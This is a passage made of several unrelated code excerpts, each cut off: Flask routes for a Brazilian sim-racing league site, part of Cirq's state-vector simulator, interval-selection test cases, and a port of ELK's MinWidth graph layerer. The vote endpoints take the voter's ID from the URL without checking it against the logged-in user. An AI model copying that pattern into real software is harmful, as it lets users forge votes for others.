seasonratingrange.append(round((3* res['sigma'] + res['points']) * 1000))
else:
seasonratingvalues.append(float(0))
seasonratingrange.append(float(0))
for label in ranklabels:
if label in seasonranklabels and label != 'start':
season_rank = db.SeasonHistRank.find_one({'filename':label})['positions']
for pos in season_rank:
if pos['steamID'] == user['steam_id']:
seasonrankposition.append(pos['rank_pos'])
else:
seasonrankposition.append(0)
#print(incidentaverage)
#user = dbusers.users.find_one({'_id': userid})
#print(user)
try:
form.phrase.data = user['phrase']
form.about.data = user['about']
form.name.data = user['name']
form.lastname.data = user['lastname']
form.city.data = user['city']
form.gender.data = user['gender']
form.state.data = user['state']
form.birthday.data = datetime.strptime(user['birthday'], '%d-%m-%Y')
except:
pass
return render_template('user-single.html',formuploadphoto=formuploadphoto, form=form, user=user,
top10list=top10list, ratingrange=ratingrange, incidentaverage=incidentaverage,
incidentlabels=incidentlabels, incidentvalues=incidentvalues, userid=userid,
driver=driver, ratinglabels = ratinglabels, ratingvalues=ratingvalues,
rankposition=rankposition, ranklabels=ranklabels, c_user=c_user, seasontop10list=seasontop10list,
seasonratingvalues=seasonratingvalues, seasonratingrange=seasonratingrange, seasonrankposition=seasonrankposition)
@application.route('/agenda')
@login_required
def agenda():
#gets logged user information
user = current_user.user_obj()
driver = db.Drivers.find_one({'steamID': user['steam_id']})
agenda = list(db.ScheduledRace.find().sort([('timestamp_start', 1)]))
tz = pytz.timezone('Brazil/East')
for i in range(len(agenda)):
time_difference = tz.localize(datetime.strptime(agenda[i]['date'] + ' ' + agenda[i]['time'], '%d-%m-%Y %H:%M')) - datetime.now(tz)
if time_difference < timedelta(0, 1800):
agenda[i]['open'] = True
else:
agenda[i]['open'] = False
return render_template('agenda.html', agenda=agenda, user=user)
@application.route('/raceresult/<raceid>')
@login_required
def raceresult(raceid):
voters = db.ResultVote.find_one({'resultid': ObjectId(raceid)})
user = current_user.get_id()
username = current_user.get_username()
print(username)
result = db.RaceResult.find_one({'_id': ObjectId(raceid)})
try:
delta = db.HistRank.find_one({'filename': result['racefilename']})['positions']
except:
delta = []
for res in result['race']:
dr_dict = {'steamID': res['steamID'],
'delta' : 0}
delta.append(dr_dict)
for r in range(len(result['race'])):
for de in delta:
if de['steamID'] == result['race'][r]['steamID']:
try:
result['race'][r]['delta'] = de['delta']
except:
result['race'][r]['delta'] = 0
if 'delta' not in result['race'][r]:
result['race'][r]['delta'] = 0
print(result['race'])
practice = result['practice']
qualify = result['qualify']
race = result['race']
return render_template('raceresult.html', result=result, practice=practice,
qualify=qualify, race=race, user=user, username=username, voters=voters, raceid=raceid)
@application.route('/upvote/<resultid>/<voterid>/<userid>')
@login_required
def upvote(resultid, voterid, userid):
result = db.RaceResult.find_one({'_id': ObjectId(resultid),
'race.userid': voterid})
voteruser = dbusers.users.find_one({'_id': voterid})
user = dbusers.users.find_one({'_id':userid})
username = voteruser['username']
votedict = {'voterid': voterid,
'userid': userid,
'username': username}
user_steamid = user['steam_id']
if voterid == userid:
#check if user is trying to vote himself/herself
flash('Recomendação não computada pois você não pode votar em si mesmo')
#print('Votar em si mesmo')
return redirect(url_for('raceresult', raceid=resultid))
if not result:
#check if the voter was participating in the race
flash('Recomendação não computada pois ' + current_user.get_username() + ' não participou da corrida!')
#print('Votante não participou da corrida')
return redirect(url_for('raceresult', raceid=resultid))
#Check if the voted id is really in the result
result = db.RaceResult.find_one({'_id': ObjectId(resultid),
'race.userid': userid})
if not result:
flash('Recomendação não computada pois o piloto em que você votou parece não ter participado da corrida!')
#print('Votado não participou da corrida')
return redirect(url_for('raceresult', raceid=resultid))
votedoc = db.ResultVote.find_one({'resultid': ObjectId(resultid)})
#CHECK IF A VOTING DOCUMENT IS ALREADY WRITTEN FOR THE RESULT
if votedoc:
#Here the document already exists, so we update it!
votelist = votedoc['upvote']
downvotelist = votedoc['downvote']
#Each user has ONE upvote for the race,
#now we check if the user have already voted for any driver
votetwice = False
for item in votedoc['upvote']:
if item['voterid'] == voterid:
votetwice = True #yes, he voted for some driver!
#Now we check if the voter have already voted in the same driver
vote = False
if votedict in votelist:
vote = True
#After checking, we update the Document
if votetwice == False:
#The voter didnt vote in any driver
#we input his vote!
votelist.append(votedict)
if votedict in downvotelist:
downvotelist.remove(votedict)
db.ResultVote.update_one({'resultid': ObjectId(resultid)}, {'$set':{'upvote':votelist,
'downvote': downvotelist}})
db.Drivers.update_one({'steamID': user_steamid}, {'$inc': {'votes': 1}})
flash('Recomendação computada')
#print('Voto computado')
else:
#The voter have voted before,
#if he is voting in the same driver, we might take the vote out
if vote:
votelist.remove(votedict)
db.ResultVote.update_one({'resultid': ObjectId(resultid)}, {'$set':{'upvote':votelist}})
db.Drivers.update_one({'steamID': user_steamid}, {'$inc': {'votes': -1}})
flash('Recomendação retirada!')
#print('Voto retirado')
#The voter has already voted. So we take out his/her vote
elif votetwice:
flash('Recomendação não computada pois você não pode recomendar mais de um piloto')
#print('Recomendar duplamente')
return redirect(url_for('raceresult', raceid=resultid))
else:
#Here the doc doesnt exist, so we create it
db.ResultVote.insert_one({'resultid': ObjectId(resultid),
'upvote': [votedict],
'downvote': []})
db.Drivers.update_one({'steamID': user_steamid}, {'$inc': {'votes': 1}})
flash('Recomendação computada')
#print('voto computado, db criado')
return redirect(url_for('raceresult', raceid=resultid))
@application.route('/downvote/<resultid>/<voterid>/<userid>')
@login_required
def downvote(resultid, voterid, userid):
result = db.RaceResult.find_one({'_id': ObjectId(resultid),
'race.userid': voterid})
username = dbusers.users.find_one({'_id': voterid})['username']
votedict = {'voterid': voterid,
'userid': userid,
'username': username}
if voterid == userid:
#check if user is trying to vote himself/herself
flash('Contra-indicação não computada pois você não pode votar em si mesmo')
#print('Votar em si mesmo')
return redirect(url_for('raceresult', raceid=resultid))
if not result:
#check if the voter was participating in the race
flash('Contra-indicação não computada pois ' + current_user.get_username() + ' não participou da corrida!')
#print('Votante não participou da corrida')
return redirect(url_for('raceresult', raceid=resultid))
#Check if the voted id is really in the result
result = db.RaceResult.find_one({'_id': ObjectId(resultid),
'race.userid': userid})
if not result:
flash('Contra-indicação não computada pois parece que o piloto não indicado não participou da corrida!')
#print('Votado não participou da corrida')
return redirect(url_for('raceresult', raceid=resultid))
votedoc = db.ResultVote.find_one({'resultid': ObjectId(resultid)})
#CHECK IF A VOTING DOCUMENT IS ALREADY WRITTEN FOR THE RESULT
if votedoc:
#Here the document already exists, so we update it
downvotelist = votedoc['downvote']
votelist = votedoc['upvote']
#Each user has ONE upvote for the race,
#now we check if the user have already voted for any driver
votetwice = False
for item in votedoc['downvote']:
if item['voterid'] == voterid:
votetwice = | |
<reponame>augustehirth/Cirq<gh_stars>0
# Copyright 2018 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Objects and methods for acting efficiently on a state vector."""
from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, TYPE_CHECKING, Type, Union
import numpy as np
from cirq import _compat, linalg, protocols, qis, sim
from cirq._compat import proper_repr
from cirq.sim.act_on_args import ActOnArgs, strat_act_on_from_apply_decompose
from cirq.linalg import transformations
if TYPE_CHECKING:
import cirq
from numpy.typing import DTypeLike
class _BufferedStateVector(qis.QuantumStateRepresentation):
"""Contains the state vector and buffer for efficient state evolution."""
def __init__(self, state_vector: np.ndarray, buffer: Optional[np.ndarray] = None):
"""Initializes the object with the inputs.
This initializer creates the buffer if necessary.
Args:
state_vector: The state vector, must be correctly formatted. The data is not checked
for validity here due to performance concerns.
buffer: Optional, must be same shape as the state vector. If not provided, a buffer
will be created automatically.
"""
self._state_vector = state_vector
if buffer is None:
buffer = np.empty_like(state_vector)
self._buffer = buffer
self._qid_shape = state_vector.shape
@classmethod
def create(
cls,
*,
initial_state: Union[np.ndarray, 'cirq.STATE_VECTOR_LIKE'] = 0,
qid_shape: Optional[Tuple[int, ...]] = None,
dtype: Optional['DTypeLike'] = None,
buffer: Optional[List[np.ndarray]] = None,
):
"""Initializes the object with the inputs.
This initializer creates the buffer if necessary.
Args:
initial_state: The density matrix, must be correctly formatted. The data is not
checked for validity here due to performance concerns.
qid_shape: The shape of the density matrix, if the initial state is provided as an int.
dtype: The dtype of the density matrix, if the initial state is provided as an int.
buffer: Optional, must be length 3 and same shape as the density matrix. If not
provided, a buffer will be created automatically.
Raises:
ValueError: If initial state is provided as integer, but qid_shape is not provided.
"""
if not isinstance(initial_state, np.ndarray):
if qid_shape is None:
raise ValueError('qid_shape must be provided if initial_state is not ndarray')
state_vector = qis.to_valid_state_vector(
initial_state, len(qid_shape), qid_shape=qid_shape, dtype=dtype
).reshape(qid_shape)
else:
if qid_shape is not None:
state_vector = initial_state.reshape(qid_shape)
else:
state_vector = initial_state
if np.may_share_memory(state_vector, initial_state):
state_vector = state_vector.copy()
state_vector = state_vector.astype(dtype, copy=False)
return cls(state_vector, buffer)
def copy(self, deep_copy_buffers: bool = True) -> '_BufferedStateVector':
"""Copies the object.
Args:
deep_copy_buffers: True by default, False to reuse the existing buffers.
Returns:
A copy of the object.
"""
return _BufferedStateVector(
state_vector=self._state_vector.copy(),
buffer=self._buffer.copy() if deep_copy_buffers else self._buffer,
)
def kron(self, other: '_BufferedStateVector') -> '_BufferedStateVector':
"""Creates the Kronecker product with the other state vector.
Args:
other: The state vector with which to kron.
Returns:
The Kronecker product of the two state vectors.
"""
target_tensor = transformations.state_vector_kronecker_product(
self._state_vector, other._state_vector
)
return _BufferedStateVector(
state_vector=target_tensor,
buffer=np.empty_like(target_tensor),
)
def factor(
self, axes: Sequence[int], *, validate=True, atol=1e-07
) -> Tuple['_BufferedStateVector', '_BufferedStateVector']:
"""Factors a state vector into two independent state vectors.
This function should only be called on state vectors that are known to be separable, such
as immediately after a measurement or reset operation. It does not verify that the provided
state vector is indeed separable, and will return nonsense results for vectors
representing entangled states.
Args:
axes: The axes to factor out.
validate: Perform a validation that the state vector factors cleanly.
atol: The absolute tolerance for the validation.
Returns:
A tuple with the `(extracted, remainder)` state vectors, where `extracted` means the
sub-state vector which corresponds to the axes requested, and with the axes in the
requested order, and where `remainder` means the sub-state vector on the remaining
axes, in the same order as the original state vector.
"""
extracted_tensor, remainder_tensor = transformations.factor_state_vector(
self._state_vector, axes, validate=validate, atol=atol
)
extracted = _BufferedStateVector(
state_vector=extracted_tensor,
buffer=np.empty_like(extracted_tensor),
)
remainder = _BufferedStateVector(
state_vector=remainder_tensor,
buffer=np.empty_like(remainder_tensor),
)
return extracted, remainder
def reindex(self, axes: Sequence[int]) -> '_BufferedStateVector':
"""Transposes the axes of a state vector to a specified order.
Args:
axes: The desired axis order.
Returns:
The transposed state vector.
"""
new_tensor = transformations.transpose_state_vector_to_axis_order(self._state_vector, axes)
return _BufferedStateVector(
state_vector=new_tensor,
buffer=np.empty_like(new_tensor),
)
def apply_unitary(self, action: Any, axes: Sequence[int]) -> bool:
"""Apply unitary to state.
Args:
action: The value with a unitary to apply.
axes: The axes on which to apply the unitary.
Returns:
True if the operation succeeded.
"""
new_target_tensor = protocols.apply_unitary(
action,
protocols.ApplyUnitaryArgs(
target_tensor=self._state_vector,
available_buffer=self._buffer,
axes=axes,
),
allow_decompose=False,
default=NotImplemented,
)
if new_target_tensor is NotImplemented:
return False
self._swap_target_tensor_for(new_target_tensor)
return True
def apply_mixture(self, action: Any, axes: Sequence[int], prng) -> Optional[int]:
"""Apply mixture to state.
Args:
action: The value with a mixture to apply.
axes: The axes on which to apply the mixture.
prng: The pseudo random number generator to use.
Returns:
The mixture index if the operation succeeded, otherwise None.
"""
mixture = protocols.mixture(action, default=None)
if mixture is None:
return None
probabilities, unitaries = zip(*mixture)
index = prng.choice(range(len(unitaries)), p=probabilities)
shape = protocols.qid_shape(action) * 2
unitary = unitaries[index].astype(self._state_vector.dtype).reshape(shape)
linalg.targeted_left_multiply(unitary, self._state_vector, axes, out=self._buffer)
self._swap_target_tensor_for(self._buffer)
return index
def apply_channel(self, action: Any, axes: Sequence[int], prng) -> Optional[int]:
"""Apply channel to state.
Args:
action: The value with a channel to apply.
axes: The axes on which to apply the channel.
prng: The pseudo random number generator to use.
Returns:
The kraus index if the operation succeeded, otherwise None.
"""
kraus_operators = protocols.kraus(action, default=None)
if kraus_operators is None:
return None
def prepare_into_buffer(k: int):
linalg.targeted_left_multiply(
left_matrix=kraus_tensors[k],
right_target=self._state_vector,
target_axes=axes,
out=self._buffer,
)
shape = protocols.qid_shape(action)
kraus_tensors = [
e.reshape(shape * 2).astype(self._state_vector.dtype) for e in kraus_operators
]
p = prng.random()
weight = None
fallback_weight = 0
fallback_weight_index = 0
index = None
for index in range(len(kraus_tensors)):
prepare_into_buffer(index)
weight = np.linalg.norm(self._buffer) ** 2
if weight > fallback_weight:
fallback_weight_index = index
fallback_weight = weight
p -= weight
if p < 0:
break
assert weight is not None, "No Kraus operators"
if p >= 0 or weight == 0:
# Floating point error resulted in a malformed sample.
# Fall back to the most likely case.
prepare_into_buffer(fallback_weight_index)
weight = fallback_weight
index = fallback_weight_index
self._buffer /= np.sqrt(weight)
self._swap_target_tensor_for(self._buffer)
return index
def measure(
self, axes: Sequence[int], seed: 'cirq.RANDOM_STATE_OR_SEED_LIKE' = None
) -> List[int]:
"""Measures the state vector.
Args:
axes: The axes to measure.
seed: The random number seed to use.
Returns:
The measurements in order.
"""
bits, _ = sim.measure_state_vector(
self._state_vector,
axes,
out=self._state_vector,
qid_shape=self._qid_shape,
seed=seed,
)
return bits
def sample(
self,
axes: Sequence[int],
repetitions: int = 1,
seed: 'cirq.RANDOM_STATE_OR_SEED_LIKE' = None,
) -> np.ndarray:
"""Samples the state vector.
Args:
axes: The axes to sample.
repetitions: The number of samples to make.
seed: The random number seed to use.
Returns:
The samples in order.
"""
return sim.sample_state_vector(
self._state_vector,
axes,
qid_shape=self._qid_shape,
repetitions=repetitions,
seed=seed,
)
def _swap_target_tensor_for(self, new_target_tensor: np.ndarray):
"""Gives a new state vector for the system.
Typically, the new state vector should be `args.available_buffer` where
`args` is this `cirq.ActOnStateVectorArgs` instance.
Args:
new_target_tensor: The new system state. Must have the same shape
and dtype as the old system state.
"""
if new_target_tensor is self._buffer:
self._buffer = self._state_vector
self._state_vector = new_target_tensor
@property
def supports_factor(self) -> bool:
return True
class ActOnStateVectorArgs(ActOnArgs):
"""State and context for an operation acting on a state vector.
There are two common ways to act on this object:
1. Directly edit the `target_tensor` property, which is storing the state
vector of the quantum system as a numpy array with one axis per qudit.
2. Overwrite the `available_buffer` property with the new state vector, and
then pass `available_buffer` into `swap_target_tensor_for`.
"""
@_compat.deprecated_parameter(
deadline='v0.15',
fix='Use classical_data.',
parameter_desc='log_of_measurement_results and positional arguments',
match=lambda args, kwargs: 'log_of_measurement_results' in kwargs or len(args) > 4,
)
@_compat.deprecated_parameter(
deadline='v0.15',
fix='Use initial_state instead and specify all the arguments with keywords.',
parameter_desc='target_tensor and positional arguments',
match=lambda args, kwargs: 'target_tensor' in kwargs or len(args) != 1,
)
def __init__(
self,
target_tensor: Optional[np.ndarray] = None,
available_buffer: | |
import random
def gen_test():
n = 1000
k = 100
max_end = 1000
A = []
R = random.Random(0)
for _ in range(n):
a = R.randint(0, max_end)
b = R.randint(0, max_end)
if a == b:
A.append((a, a + 1))
else:
a, b = min(a, b), max(a, b)
A.append((a, b))
x = {
'A': A,
'k': k,
'res': 668,
'sol': [10, 18, 27, 44, 45, 48, 74, 75, 77, 85]
}
print(x)
exit(0)
return x
tests = [
{
'A': [(0, 4), (1, 10), (6, 7), (2, 8)],
'k': 3,
'res': 2,
'sol': [0, 1, 3]
}, {
'A': [(x, x + 2) for x in range(50)],
'k': 2,
'res': 1,
'sol': [0, 1]
}, {
'A': [(x, x + 10) for x in range(150)],
'k': 10,
'res': 1,
'sol': [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
}, {
'A': [(100 - 5 * x, 100 + 5 * x) for x in range(15)],
'k': 14,
'res': 10,
'sol': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]
},
{
# All start at point 0
'A': [(0, 1), (0, 2), (0, 3), (0, 4), (0, 5)],
'k': 3,
'res': 3,
'sol': [2, 3, 4]
},
{
# k = 1
'A': [(0, 1), (0, 2), (0, 3), (0, 4), (0, 5)],
'k': 1,
'res': 5,
'sol': [4]
},
{
# Smaller intervals are fully contained into longer ones
'A': [(10, 11), (9, 12), (8, 13), (7, 14), (6, 15)],
'k': 3,
'res': 5,
'sol': [2, 3, 4]
},
{'A': [(394, 864), (776, 911), (41, 430), (265, 988), (497, 523), (414, 940), (802, 849), (310, 991), (366, 488),
(597, 913), (223, 929), (142, 516),
(143, 288), (97, 773), (633, 818), (256, 931), (545, 722), (616, 829), (150, 923), (101, 317), (75, 747),
(870, 920), (338, 700), (483, 573),
(103, 362), (323, 444), (625, 655), (209, 934), (565, 989), (453, 488), (533, 886), (63, 266), (824, 940),
(561, 937), (14, 95), (736, 860),
(408, 727), (803, 844), (640, 684), (1, 626), (505, 847), (341, 888), (249, 747), (333, 720), (64, 891),
(195, 939), (227, 581), (244, 822),
(145, 990), (556, 822), (93, 458), (82, 327), (520, 896), (501, 955), (111, 308), (298, 564), (127, 723),
(340, 560), (834, 944), (208, 553),
(818, 986), (560, 617), (294, 601), (93, 455), (610, 817), (324, 394), (247, 589), (188, 297), (193, 841),
(33, 191), (627, 672), (266, 487),
(70, 91), (695, 775), (133, 897), (153, 945), (39, 862), (82, 919), (716, 945), (553, 849), (400, 699),
(722, 857), (282, 537), (534, 831),
(241, 869), (220, 916), (603, 695), (845, 972), (429, 593), (281, 461), (504, 676), (656, 717), (812, 938),
(84, 365), (332, 627), (118, 498),
(601, 645), (343, 865), (194, 248), (16, 749)],
'k': 10,
'res': 668,
'sol': [10, 18, 27, 44, 45, 48, 74, 75, 77, 85]
},
{'A': [(394, 864), (776, 911), (41, 430), (265, 988), (497, 523), (414, 940), (802, 849), (310, 991), (366, 488),
(597, 913), (223, 929), (142, 516),
(143, 288), (97, 773), (633, 818), (256, 931), (545, 722), (616, 829), (150, 923), (101, 317), (75, 747),
(870, 920), (338, 700), (483, 573),
(103, 362), (323, 444), (625, 655), (209, 934), (565, 989), (453, 488), (533, 886), (63, 266), (824, 940),
(561, 937), (14, 95), (736, 860),
(408, 727), (803, 844), (640, 684), (1, 626), (505, 847), (341, 888), (249, 747), (333, 720), (64, 891),
(195, 939), (227, 581), (244, 822),
(145, 990), (556, 822), (93, 458), (82, 327), (520, 896), (501, 955), (111, 308), (298, 564), (127, 723),
(340, 560), (834, 944), (208, 553),
(818, 986), (560, 617), (294, 601), (93, 455), (610, 817), (324, 394), (247, 589), (188, 297), (193, 841),
(33, 191), (627, 672), (266, 487),
(70, 91), (695, 775), (133, 897), (153, 945), (39, 862), (82, 919), (716, 945), (553, 849), (400, 699),
(722, 857), (282, 537), (534, 831),
(241, 869), (220, 916), (603, 695), (845, 972), (429, 593), (281, 461), (504, 676), (656, 717), (812, 938),
(84, 365), (332, 627), (118, 498),
(601, 645), (343, 865), (194, 248), (16, 749), (119, 277), (225, 722), (380, 813), (174, 340), (436, 835),
(63, 103), (149, 801), (714, 875),
(46, 224), (587, 836), (649, 931), (547, 958), (616, 696), (27, 75), (127, 650), (193, 620), (589, 850),
(122, 400), (93, 379), (118, 853),
(37, 620), (22, 199), (984, 993), (189, 735), (126, 490), (215, 744), (62, 819), (695, 959), (23, 557),
(435, 635), (103, 855), (71, 266), (73, 226),
(308, 662), (358, 446), (62, 184), (478, 515), (40, 610), (103, 716), (204, 400), (266, 367), (749, 926),
(481, 858), (923, 940), (173, 583),
(688, 714), (208, 989), (59, 785), (692, 807), (162, 865), (165, 350), (256, 542), (120, 611), (452, 943),
(179, 681), (13, 482), (419, 697),
(582, 921), (520, 895), (318, 939), (365, 664), (397, 857), (256, 673), (157, 574), (12, 707), (468, 759),
(80, 343), (46, 756), (287, 557),
(138, 245), (780, 976), (360, 493), (294, 624), (367, 689), (604, 969), (648, 913), (635, 874), (135, 732),
(317, 397), (424, 766), (666, 848),
(1, 82), (196, 608), (342, 715), (163, 245), (228, 652), (387, 458), (727, 896), (581, 689), (424, 895),
(32, 411), (718, 892), (428, 581),
(678, 790), (47, 726), (169, 456), (65, 265), (161, 718), (457, 540), (498, 906), (574, 929), (618, 773),
(0, 905), (39, 506), (319, 333),
(478, 857), (51, 828), (842, 896), (831, 997), (192, 425), (561, 986), (85, 648), (742, 857), (15, 133),
(411, 972), (427, 694), (3, 323), (14, 218),
(734, 772), (2, 842), (541, 691), (100, 626), (121, 195), (622, 664), (203, 894), (286, 309), (186, 705),
(102, 487), (874, 944), (406, 642),
(22, 83), (281, 935), (463, 819), (118, 811), (262, 882), (136, 669), (533, 836), (660, 666), (117, 355),
(158, 892), (285, 871), (19, 43),
(41, 210), (265, 697), (322, 571), (375, 969), (581, 960), (869, 931), (43, 866), (767, 984), (622, 718),
(506, 671), (659, 729), (469, 924),
(445, 655), (381, 892), (182, 550), (212, 384), (298, 601), (9, 141), (154, 277), (341, 345), (376, 808),
(95, 735), (346, 798), (36, 635),
(42, 276), (153, 167), (296, 597), (369, 404), (132, 561), (117, 300), (489, 748), (245, 956), (49, 315),
(183, 877), (535, 746), (72, 309),
(412, 855), (306, 336), (111, 424), (101, 574), (492, 930), (345, 485), (817, 861), (831, 999), (127, 351),
(118, 490), (509, 716), (38, 436),
(309, 343), (703, 752), (159, 915), (170, 941), (578, 641), (384, 825), (654, 997), (67, 89), (86, 827),
(202, 767), (62, 226), (8, 394), (100, 403),
(531, 569), (296, 459), (500, 942), (598, 807), (695, 731), (222, 433), (85, 377), (225, 267), (599, 795),
(170, 441), (196, 367), (65, 117),
(841, 884), (718, 873), (28, 924), (462, 538), (693, 770), (121, 206), (407, 509), (212, 262), (43, 656),
(816, 970), (221, 638), (107, 149),
(202, 469), (370, 387), (559, 846), (107, 154), (499, 610), (151, 577), (415, 653), (433, 696), (533, 898),
(507, 695), (909, 939), (330, 853),
(510, 511), (650, 686), (206, 895), (555, 624), (224, 953), (9, 348), (722, 985), (764, 920), (325, 837),
(36, 329), (151, 537), (263, 895),
(617, 802), (159, 862), (388, 596), (301, 735), (723, 826), (67, 481), (86, 819), (528, 889), (40, 937),
(67, 230), (41, 133), (15, 307), (777, 864),
(338, 459), (164, 882), (152, 819), (671, 889), (471, 991), (380, 517), (391, 922), (514, 542), (34, 587),
(92, 694), (813, 824), (530, 776),
(78, 614), (436, 764), (772, 927), (211, 296), (548, 922), (427, 612), (845, 995), (493, 865), (810, 995),
(397, 622), (239, 600), (871, 885),
(20, 817), (672, 906), (0, 758), (186, 309), (519, 583), (260, 340), (67, 505), (268, 880), (844, 965),
(310, 791), (393, 417), (392, 829),
(63, 167), (656, 957), (130, 244), (293, 746), | |
from math import inf
from typing import Optional
from layeredGraphLayouter.containers.constants import PortType
from layeredGraphLayouter.containers.lNode import LNode
from layeredGraphLayouter.containers.lGraph import LGraph
from layeredGraphLayouter.layoutProcessorConfiguration import LayoutProcessorConfiguration
from layeredGraphLayouter.edgeManipulators.edgeAndLayerConstraintEdgeReverser import EdgeAndLayerConstraintEdgeReverser
from layeredGraphLayouter.nodeManipulators.layerConstraintProcessor import LayerConstraintProcessor
from layeredGraphLayouter.iLayoutProcessor import ILayoutProcessor
LAYERING_MIN_WIDTH_UPPER_BOUND_ON_WIDTH = 10
LAYERING_MIN_WIDTH_UPPER_LAYER_ESTIMATION_SCALING_FACTOR = 1
SPACING_EDGE_EDGE = 5
UPPERBOUND_ON_WIDTH_RANGE = (1, 4)
COMPENSATOR_RANGE = (1, 2)
class MinWidthLayerer(ILayoutProcessor):
"""
:note: ported from ELK
Implementation of the heuristic MinWidth for solving the NP-hard minimum-width layering problem
with consideration of dummy nodes. MinWidth is based on the longest-path algorithm, which finds
layerings with the minimum height, but doesn't consider the width of the graph. MinWidth also
considers an upper bound on the width of a given graph. The upper bound isn't a "bound" in a
strict sense, as some layers might exceed its limit, if certain conditions are met.
Details are described in
<NAME>, <NAME>, and <NAME>. 2005. In search for efficient
heuristics for minimum-width graph layering with consideration of dummy nodes. J. Exp.
Algorithmics 10, Article 2.7 (December 2005). DOI=10.1145/1064546.1180618
http://doi.acm.org/10.1145/1064546.1180618.
MinWidth takes two additional parameters, which can be configured as a property:
Upper Bound On Width {@link LayeredOptions#UPPER_BOUND_ON_WIDTH} – Defines a loose upper bound on
the width of the MinWidth layerer. Defaults to -1 (special value for using both 1, 2, 3 and 4 as
values and choosing the narrowest layering afterwards), lower bound is 1.
Upper Layer Estimation Scaling Factor
{@link LayeredOptions#UPPER_LAYER_ESTIMATION_SCALING_FACTOR} – Multiplied with
{@link LayeredOptions#UPPER_BOUND_ON_WIDTH} for defining an upper bound on the width of layers which
haven't been placed yet, but whose maximum width had been (roughly) estimated by the MinWidth
algorithm. Compensates for too high estimations. Defaults to -1 (special value for using both 1
and 2 as values and choosing the narrowest layering afterwards), lower bound is 1.
This version of the algorithm, however, differs from the one described in the paper as it
considers the actual size of the nodes of the graph in order to handle real world use cases of
graphs a little bit better. The approach is based on <NAME>'s version in his implementation
of the heuristic {@link StretchWidthLayerer}. Some changes include:
estimating the sizes of dummy nodes by taking the edge spacing of the {@link LGraph} into
account,
finding the narrowest real node of the graph and normalizing all the widths of the nodes of
the graph (real and dummy) in relation to this node,
computing the average size of all real nodes (we don't know the number of dummy nodes in
advance),
using this average as a factor for the ubw-value given by the user in order to adjust the
boundary to our new approach (using the result of this multiplication instead of the given value
of ubw thus changes the condition to start a new layer from the paper slightly).
Precondition:
the graph has no cycles, but might contain self-loops
Postcondition:
all nodes have been assigned a layer such that edges connect only nodes from layers with
increasing indices
Recommended values for the algorithm suggested bei Nikolov et al. after a parameter study,
see:
<NAME>, <NAME>, and <NAME>. 2004. A Heuristic for
Minimum-Width Graph Layering with Consideration of Dummy Nodes. Experimental and Efficient
Algorithms, Third International Workshop, WEA 2004, Lecture Notes in Computer Science 3059.
Springer-Verlag, New York, 570-583. DOI=10.1007/978-3-540-24838-5_42
http://dx.doi.org/10.1007/978-3-540-24838-5_42.
"""
@staticmethod
def getLayoutProcessorConfiguration(graph: LGraph) -> LayoutProcessorConfiguration:
return LayoutProcessorConfiguration(
p1_cycle_breaking_before=[EdgeAndLayerConstraintEdgeReverser()],
p3_node_ordering_before=[LayerConstraintProcessor()])
def precalculateConstants(self, notInserted):
# Compute the minimum nodes size (of the real nodes). We're going to use this value in the
# next step to normalize the different node sizes.
minimumNodeSize = min(
notInserted, key=lambda node: node.size.y)
# The minimum nodes size might be zero. If This is the case, then simply don't normalize
# the node sizes.
minimumNodeSize = max(1, minimumNodeSize.size.y)
# We initialize the nodes' id and use it to refer to its in- and out-degree stored each in
# an array. We also compute the size of each node in relation to the smallest real node in
# the graph (normalized size) and store it in the same way.
avgSize = 0
for node in notInserted:
node.initPortDegrees()
node.normHeight = node.size.y / minimumNodeSize
# The average size of a node will also be based on the normalized
# size.
avgSize += node.normHeight
# First step to consider the real size of nodes: Initialize the dummy size with the spacing
# properties
dummySize = SPACING_EDGE_EDGE
# normalize dummy size, too:
self.dummySize = dummySize / minimumNodeSize
# Divide sum of normalized node sizes by the number of nodes to get an
# actual mean.
self.avgSize = avgSize / len(notInserted)
def process(self, graph: LGraph):
notInserted = graph.getLayerlessNodes()
# The algorithm requires DAG G = (V, E). In this version self-loops are allowed (as we're
# going to filter them). Additional properties as described above (called UBW and c in the
# original paper):
upperBoundOnWidth = LAYERING_MIN_WIDTH_UPPER_BOUND_ON_WIDTH
compensator = LAYERING_MIN_WIDTH_UPPER_LAYER_ESTIMATION_SCALING_FACTOR
self.precalculateConstants(notInserted)
# Precalculate the successors of all nodes (as a Set) and put them in a
# list.
self.successors = self.precalcSuccessors(notInserted)
# Guarantee ConditionSelect from the paper, which states that nodes with maximum out-degree
# should be preferred during layer placement, by ordering the nodes by descending maximum
# out-degree in advance.
notInserted.sort(key=lambda node: node.outdeg)
# minimum width of a layer of maximum size in a computed layering (primary criterion used
# for comparison, if more than one layering is computed). It's a double as it takes in
# account the actual width based on the normalized size of the nodes.
minWidth = inf
# minimum number of layers in a computed layering {@code minWidth} (secondary
# criterion used for comparison, if more than one layering is
# computed).
minNumOfLayers = inf
# holding the currently chosen candidate for the final layering as a
# List
candidateLayering = None
# At first blindly set the parameters for the loose upper bound and the compensator to the
# exact values, which have been configured via their respective properties, so that only
# one layering will be computed
ubwStart = upperBoundOnWidth
ubwEnd = upperBoundOnWidth
cStart = compensator
cEnd = compensator
# ... then check, whether any special values (i.e. negative values, which aren't valid)
# have been used for the properties. In that case use the recommended ranges
# described above
if upperBoundOnWidth < 0:
ubwStart, ubwEnd = UPPERBOUND_ON_WIDTH_RANGE
if compensator < 0:
cStart, cEnd = COMPENSATOR_RANGE
# … Depending on the start- and end-values, this nested for-loop will last for up to 8
# iterations resulting in one, two, four or eight different layerings.
for ubw in range(ubwStart, ubwEnd + 1):
for c in range(cStart, cEnd + 1):
newWidth, layering = self.computeMinWidthLayering(
ubw, c, notInserted)
# Important if more than one layering is computed: replace the current candidate
# layering with a newly computed one, if it is narrower or has the same maximum
# width but less layers.
newNumOfLayers = len(layering)
if (newWidth < minWidth
or (newWidth == minWidth and newNumOfLayers < minNumOfLayers)):
minWidth = newWidth
minNumOfLayers = newNumOfLayers
candidateLayering = layering
# Finally, add the winning layering to the Klay layered data
# structures.
# The algorithm constructs the layering bottom up, but ElkLayered expects the list of
